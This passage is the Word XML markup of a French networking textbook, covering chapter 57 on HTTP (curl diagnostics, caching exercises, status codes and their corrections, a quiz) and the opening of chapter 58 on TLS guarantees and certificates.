                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> : statut et en-têtes.</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curl -v</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> : échange complet, y compris TLS.</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curl -w</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> : chronométrage des étapes.</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curl -H</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> : simuler un cache ou un client.</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openssl s_client</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> : négociation TLS et ALPN.</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HTTP/1.1 est textuel, HTTP/2 et 3 sont binaires.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méthode exprime l'intention ; l'idempotence conditionne les reprises.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Un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>301</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est mis en cache durablement.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HTTP/2 multiplexe sur une connexion TCP unique.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HTTP/3 supprime le blocage TCP en passant par QUIC.</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compression ne s'applique pas aux formats déjà compressés.</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no-cache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> revalide, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>no-store</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> interdit le stockage.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Vary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> protège les variantes d'une réponse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HTTP circule en clair. Le chapitre suivant ajoute le chiffrement qui protège et authentifie les échanges : TLS.</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57.1 — Analyser une réponse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 fichier statique est rechargé à chaque visite.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Inspectez les en-têtes.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Identifiez la cause.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Proposez une politique de cache.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 57.2 — Choisir le bon code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   HTTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Cinq situations doivent renvoyer un code approprié.</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Création d'une ressource.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Validation échouée.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Trop de requêtes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>4.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Maintenance planifiée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>5.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Redirection permanente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 57.3 — Comparer deux versions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   MESURE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Mesurez le chargement d'une page en HTTP/1.1 et en HTTP/2.</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Comptez les connexions.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Comparez le temps total.</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Expliquez l'écart.</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57.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>curl -sI https://exemple.fr/app.js</w:t>
        <w:br/>
        <w:t># HTTP/1.1 200 OK</w:t>
        <w:br/>
        <w:t># Cache-Control: no-cache</w:t>
        <w:br/>
        <w:t># ETag: "a1b2c3"</w:t>
        <w:br/>
        <w:br/>
        <w:t># Correction : nom versionné + cache long</w:t>
        <w:br/>
        <w:t># app.3f2a91.js</w:t>
        <w:br/>
        <w:t># Cache-Control: public, max-age=31536000, immutable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>no-cache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> force la revalidation à chaque requête, ce qui coûte un aller-retour même quand le contenu n'a pas changé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'empreinte dans le nom rend le cache long sûr : tout changement produit une nouvelle URL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 57.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">201 Created avec en-tête </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>422 Unprocessable Entity avec le détail des champs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">429 Too Many Requests avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Retry-After</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">503 Service Unavailable avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Retry-After</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>308 Permanent Redirect, qui préserve la méthode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 57.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>curl -s -o /dev/null -w "%{http_version} %{time_total}\n" --http1.1 https://exemple.fr</w:t>
        <w:br/>
        <w:t>curl -s -o /dev/null -w "%{http_version} %{time_total}\n" --http2 https://exemple.fr</w:t>
        <w:br/>
        <w:br/>
        <w:t># Observer les connexions ouvertes dans l'onglet Réseau</w:t>
        <w:br/>
        <w:t># HTTP/1.1 : plusieurs connexions parallèles par domaine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HTTP/2 réduit l'écart en multiplexant, mais le gain dépend du nombre de ressources et de la latence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Sur une page déjà optimisée et peu fournie, l'écart peut être faible : la version n'est pas une fin en soi.</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Quelle méthode est idempotente mais non sûre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GET</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PUT</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POST</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HEAD</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 signifie un code 304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Erreur</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Contenu inchangé, cache valide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Redirection</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Créé</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Sur quel transport repose HTTP/3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TCP</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QUIC sur UDP</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SCTP</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IP direct</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Quelle directive interdit tout stockage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no-cache</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no-store</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max-age=0</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private</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Pourquoi ne pas compresser une image JPEG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C'est interdit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Elle est déjà compressée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Cela change les couleurs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Cela prend trop de temps</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>PUT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> modifie l'état mais peut être rejoué sans effet supplémentaire.</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Le client peut réutiliser sa copie en cache.</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QUIC apporte fiabilité et multiplexage au-dessus d'UDP.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>no-store</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> empêche l'écriture dans tout cache.</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La recompression n'apporte presque rien et coûte du processeur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>58. TLS et certificats</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Chiffrer, authentifier et renouveler : ce que TLS garantit, et ce qu'il ne garantit pas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Intermédiaire · Prérequis : chapitre 57</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Décrire une poignée de main TLS 1.3.</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Choisir un type de certificat adapté.</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Automatiser l'émission et le renouvellement.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Vérifier une chaîne de confiance.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Éviter les erreurs de configuration les plus fréquentes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>58.1 Trois garanties</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>TLS assure la confidentialité, l'intégrité et l'authentification du serveur. Il ne protège pas contre une application vulnérable, ni contre un serveur mal configuré, ni contre un attaquant qui contrôle la machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.204 — Quatre garanties et leurs limites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45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Garantie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Mécanisme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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Limite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Confidentialité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3141"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Chiffrement symétrique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3414"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Métadonnées visibles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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Intégrité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Code d'authentification de message</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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Ne protège pas les sauvegardes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Authentification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3141"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Certificat et chaîne de confiance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3414"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sauf certificat volé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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Confidentialité persistante</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Échange éphémère (ECDHE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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Sauf clé compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3238500"/>
            <wp:docPr id="70" name="Picture 70"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f68.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId102"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3238500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.68 — Une poignée de main TLS 1.3</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CONFIDENTIALITÉ PERSISTANTE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Propriété d'une session dont la clé de session ne peut pas être reconstituée même si la clé privée du serveur est compromise plus tard.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
